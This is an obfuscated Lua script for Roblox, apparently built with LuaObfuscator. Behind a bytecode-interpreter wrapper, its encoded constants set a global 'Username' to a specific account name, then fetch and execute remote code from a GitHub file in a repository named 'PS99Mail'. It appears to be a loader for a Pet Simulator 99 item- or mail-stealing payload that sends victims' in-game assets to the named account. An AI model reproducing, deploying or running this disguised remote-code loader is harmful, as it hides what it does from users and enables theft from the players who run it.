--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 -0)) then v84=(v31/(2^(v32-1)))%((3 -1)^(((v33-(2 -(1 + 0))) -(v32-1)) + (1 -0) + 0)) ;return v84-(v84%(1066 -(68 + 997))) ;end end else local v85=(879 -(282 + 595))^(v32-(620 -(555 + 64))) ;return (((v31%(v85 + v85))>=v85) and (1638 -(1523 + (1384 -(226 + 1044))))) or 0 ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 3 + 0 );v19=v19 + 4 ;return (v37 * (3720433 + 13056783)) + (v36 * ((286327 -(892 + 65)) -219834)) + (v35 * (373 -(32 + 85))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 -0 ;local v39;local v40;local v41;local v42;local v43;local v44;while true do local v65=0 + 0 ;local v66;while true do if (v65==(0 -0)) then v66=0 -0 ;while true do if ((0 + 0)==v66) then if (v38==0) then local v97=0 + 0 ;while true do if (v97==(1057 -(87 + 968))) then v38=4 -3 ;break;end if (v97==(1 + 0)) then v41={};v42={v39,v40,nil,v41};v97=2;end if ((0 -0)==v97) then v39={};v40={};v97=1;end end end if (v38==1) then local v98=1817 -(1703 + 114) ;while true do if (v98~=2) then else v38=2;break;end if (v98==0) then v43=v24();v44={};v98=702 -(376 + 325) ;end if (v98==(1 -0)) then for v142=1,v43 do local v143=0 -0 ;local v144;local v145;local v146;while true do if (v143==1) then v146=nil;while true do if (v144==(1 + 0)) then if (v145==1) then v146=v22()~=0 ;elseif (v145==2) then v146=v25();elseif (v145==3) then v146=v26();end v44[v142]=v146;break;end if (v144==0) then v145=v22();v146=nil;v144=2 -1 ;end end break;end if (v143~=(14 -(9 + 5))) then else v144=0;v145=nil;v143=1;end end end v42[3]=v22();v98=2;end end end v66=377 -(85 + 291) ;end if ((1266 -(243 + 1022))==v66) then if (v38~=(7 -5)) then else local v99=0 + 0 ;while true do if (v99~=(1181 -(1123 + 57))) then else return v42;end if (v99~=0) then else for v147=1 + 0 ,v24() do local v148=0;local v149;local v150;while true do if (0==v148) then v149=0;v150=nil;v148=1;end if (v148==(255 -(163 + 91))) then while true do if (v149==0) then v150=v22();if (v21(v150,1,1)==(1930 -(1869 + 61))) then local v164=0;local v165;local v166;local v167;local v168;local v169;while true do if (v164==(1 + 0)) then v167=nil;v168=nil;v164=6 -4 ;end if (2==v164) then v169=nil;while true do if (0==v165) then local v170=0;while true do if (v170==0) then v166=0;v167=nil;v170=1 -0 ;end if (v170==1) then v165=1;break;end end end if (1==v165) then v168=nil;v169=nil;v165=1 + 1 ;end if ((2 -0)~=v165) then else while true do if (v166~=(0 + 0)) then else v167=v21(v150,1476 -(1329 + 145) ,3);v168=v21(v150,4,977 -(140 + 831) );v166=1;end if (v166~=(1853 -(1409 + 441))) then else if (v21(v168,721 -(15 + 703) ,2 + 1 )==1) then v169[442 -(262 + 176) ]=v44[v169[1725 -(345 + 1376) ]];end v39[v147]=v169;break;end if (2==v166) then local v172=688 -(198 + 490) ;while true do if (v172==(4 -3)) then v166=3;break;end if (v172==(0 -0)) then if (v21(v168,1207 -(696 + 510) ,1)==1) then v169[3 -1 ]=v44[v169[1264 -(1091 + 171) ]];end if (v21(v168,2,1 + 1 )==(3 -2)) then v169[9 -6 ]=v44[v169[377 -(123 + 251) ]];end v172=1;end end end if (v166~=1) then else local v173=0 -0 ;local v174;while true do if (v173==0) then v174=0;while true do if ((698 -(208 + 490))~=v174) then else v169={v23(),v23(),nil,nil};if (v167==0) then local v181=836 -(660 + 176) ;local v182;local v183;while true do if (v181~=0) then else v182=0 + 0 ;v183=nil;v181=1;end if ((203 -(14 + 188))==v181) then while true do if (v182~=0) then else v183=0;while true do if (v183~=0) then else v169[3]=v23();v169[4]=v23();break;end end break;end end break;end end elseif (v167==(676 -(534 + 141))) then v169[2 + 1 ]=v24();elseif (v167==2) then v169[3]=v24() -((2 + 0)^16) ;elseif (v167==(3 + 0)) then local v186=0;local v187;local v188;local v189;while true do if (v186~=1) then else v189=nil;while true do if (1~=v187) then else while true do if (v188==0) then v189=0;while true do if (v189==0) then v169[3]=v24() -((3 -1)^(25 -9)) ;v169[11 -7 ]=v23();break;end end break;end end break;end if (v187~=(0 + 0)) then else v188=0 + 0 ;v189=nil;v187=1;end end break;end if (v186~=0) then else v187=0;v188=nil;v186=397 -(115 + 281) ;end end end v174=2 -1 ;end if (v174~=(1 + 0)) then else v166=4 -2 ;break;end end break;end end end end break;end end break;end if (0~=v164) then else v165=0 -0 ;v166=nil;v164=868 -(550 + 317) ;end end end break;end end break;end end end for v151=1 -0 ,v24() do v40[v151-(1 -0) ]=v29();end v99=1;end end end break;end end break;end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v45=v24();local v46=v24();local v47=2 -(1 + 0) ;local v48=(v21(v46,(1742 -(282 + 1174)) -((945 -(569 + 242)) + 151) ,7 + 13 ) * ((1667 -((2794 -1824) + 695))^(60 -28))) + v45 ;local v49=v21(v46,2011 -(582 + 81 + 1327) ,107 -(1100 -(706 + 318)) );local v50=((v21(v46,13 + 19 )==(1 -0)) and  -(1 -0)) or (1582 -(1535 + 46)) ;if (v49==(0 -0)) then if (v48==(1824 -(1195 + 629))) then return v50 * ((1251 -(721 + 530)) -0) ;else local v91=241 -((1458 -(945 + 326)) + 54) ;while true do if ((780 -(162 + 618))==v91) then v49=1 + (0 -0) ;v47=0 + 0 ;break;end end end elseif (v49==(3514 -(899 + 568))) then return ((v48==(0 + 0)) and (v50 * ((1 -0)/(0 -0)))) or (v50 * NaN) ;end return v8(v50,v49-(1719 -(620 + 76)) ) * (v47 + (v48/((1 + 1)^(1688 -(1373 + 263))))) ;end v26=nil;function v26(v51)local v52;if  not v51 then v51=v24();if (v51==0) then return "";end end v52=v3(v16,v19,(v19 + v51) -(701 -(271 + 429)) );v19=v19 + v51 ;local v53={};for v67=1 + 0 , #v52 do v53[v67]=v2(v1(v3(v52,v67,v67)));end return v6(v53);end v18=5;end if (v18==2) then function v22()local v54=v1(v16,v19,v19);v19=v19 + 1 ;return v54;end v23=nil;function v23()local v55=1500 -(146 + 1262 + 92) ;local v56;local v57;while true do if (v55==1) then return (v57 * ((393 + 949) -(461 + 625))) + v56 ;end if (v55==(1288 -(993 + 295))) then v56,v57=v1(v16,v19,v19 + 1 + 1 + 0 );v19=v19 + (1173 -(418 + 753)) ;v55=1 + 0 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v58)if (v1(v58,2)==79) then v20=v0(v3(v58,1,1));return "";else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v58,16));if v20 then local v96=v5(v87,v20);v20=nil;return v96;else return v87;end break;end end end end);v18=1;end if (v18==7) then function v30(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v69=v62;local v70=v63;local v71=v64;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v88=0,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 ];else v79[v88]=v76[v88 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=9) then if (v82<=4) then if (v82<=1) then if (v82>0) then local v100=v81[2];local v101=v79[v81[3]];v79[v100 + 1 ]=v101;v79[v100]=v101[v81[4]];elseif ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v61;else v79[v81[2]]=v61[v81[3]];end elseif (v82<=2) then v79[v81[2]]();elseif (v82>3) then v61[v81[3]]=v79[v81[2]];else v79[v81[2]]=v81[3];end elseif (v82<=6) then if (v82>5) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end else do return;end end elseif (v82<=7) then v73=v81[3];elseif (v82>8) then v61[v81[3]]=v79[v81[2]];else v73=v81[3];end elseif (v82<=14) then if (v82<=11) then if (v82>10) then do return;end else local v106=0;local v107;while true do if (0==v106) then v107=v81[2];v79[v107]=v79[v107](v13(v79,v107 + 1 ,v74));break;end end end elseif (v82<=12) then v79[v81[2]]();elseif (v82>13) then local v122=v81[2];local v123=v79[v81[3]];v79[v122 + 1 ]=v123;v79[v122]=v123[v81[4]];else v79[v81[2]]=v81[3];end elseif (v82<=16) then if (v82==15) then if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v61;else v79[v81[2]]=v61[v81[3]];end else local v108=v81[2];v79[v108]=v79[v108](v13(v79,v108 + 1 ,v74));end elseif (v82<=17) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82==18) then local v133=v81[2];local v134,v135=v72(v79[v133](v13(v79,v133 + 1 ,v81[3])));v74=(v135 + v133) -1 ;local v136=0;for v155=v133,v74 do local v156=0;while true do if (v156==0) then v136=v136 + 1 ;v79[v155]=v134[v136];break;end end end else local v137=0;local v138;local v139;local v140;local v141;while true do if (v137==0) then v138=v81[2];v139,v140=v72(v79[v138](v13(v79,v138 + 1 ,v81[3])));v137=1;end if (v137==1) then v74=(v140 + v138) -1 ;v141=0;v137=2;end if (v137==2) then for v160=v138,v74 do v141=v141 + 1 ;v79[v160]=v139[v141];end break;end end end v73=v73 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!073O00028O0003083O00557365726E616D6503093O00547265785F6B696439030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F7269000F3O00120D3O00013O0026113O0001000100010004083O0001000100120D000100033O001204000100023O00122O000100043O00122O000200053O00200E00020002000600120D000400074O0012000200044O001000013O00022O000C0001000100010004083O000E00010004083O000100012O00053O00017O00",v9(),...);